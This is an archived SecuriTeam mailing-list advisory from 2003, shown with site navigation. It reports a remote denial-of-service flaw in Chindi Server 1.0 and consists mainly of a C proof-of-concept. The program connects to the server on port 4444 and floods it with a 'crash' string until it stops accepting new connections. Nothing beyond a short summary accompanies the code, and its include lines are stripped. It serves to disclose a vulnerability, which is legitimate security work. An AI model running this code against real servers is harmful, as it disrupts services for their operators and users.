logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

Chindi DoS Exploit Code
Date: 2003-04-01

Author : SecuriTeam web site: http://www.securiteam.com

The following security advisory is sent to the securiteam mailing list, and can be found at the
SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

Chindi DoS Exploit Code
------------------------------------------------------------------------


SUMMARY

Chindi is a server/client software package for encrypted file transfer
written in Java.
A security vulnerability in the product allows remote attackers to cause a
DoS attack.

DETAILS

Vulnerable systems:
Chindi Server version 1.0

Exploit code:
/************************************************************
* Chindi server 1.0 Denial of Service
* Proof of Concept by Luca Ercoli luca.ercoli at inwind.it
* After DoS, server appears to be up, but will not allow
* new connections. *
*************************************************************/

#include
#include
#include
#include
#include


#define PORT 4444
#define DOS "crash"


int main(int argc, char *argv[]){


int nOpt,count,sockfd;
struct hostent *he;
struct sockaddr_in server_addr;

char *host;


printf ("\nChindi server 1.0 remote DoS\n\n");


if(argc < 2 ) {
printf ("Usage: %s -t target\n",argv[0]);
exit(0);
}


while((nOpt = getopt(argc, argv, "t")) != -1) {

switch(nOpt) {
case 't':
host = optarg;
break;
default:exit(0);
}
}


if ((he = gethostbyname(argv[2])) == NULL)
{
herror("gethostbyname");
exit(1);
}


server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr = *((struct in_addr *) he->h_addr);


sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);


if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct
sockaddr)) == -1)
{
perror("Connect");
exit(1);
}


printf("1. Connected\n");
sleep(1);
printf("2. Sending crash string\n");
sleep(1);
printf("3. Verifing server status: ");
sleep(1);

for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);

close(sockfd);

if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct
sockaddr)) == -1)
{
printf("Crashed!.\n");
exit(1);
}

else { printf("Server don't crash!\n"); exit(0); }

}


ADDITIONAL INFORMATION

The information has been provided by
<mailto:luca.ercoli@inwind.it.luca.ercoli@inwind.it>
luca.ercoli@inwind.it.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy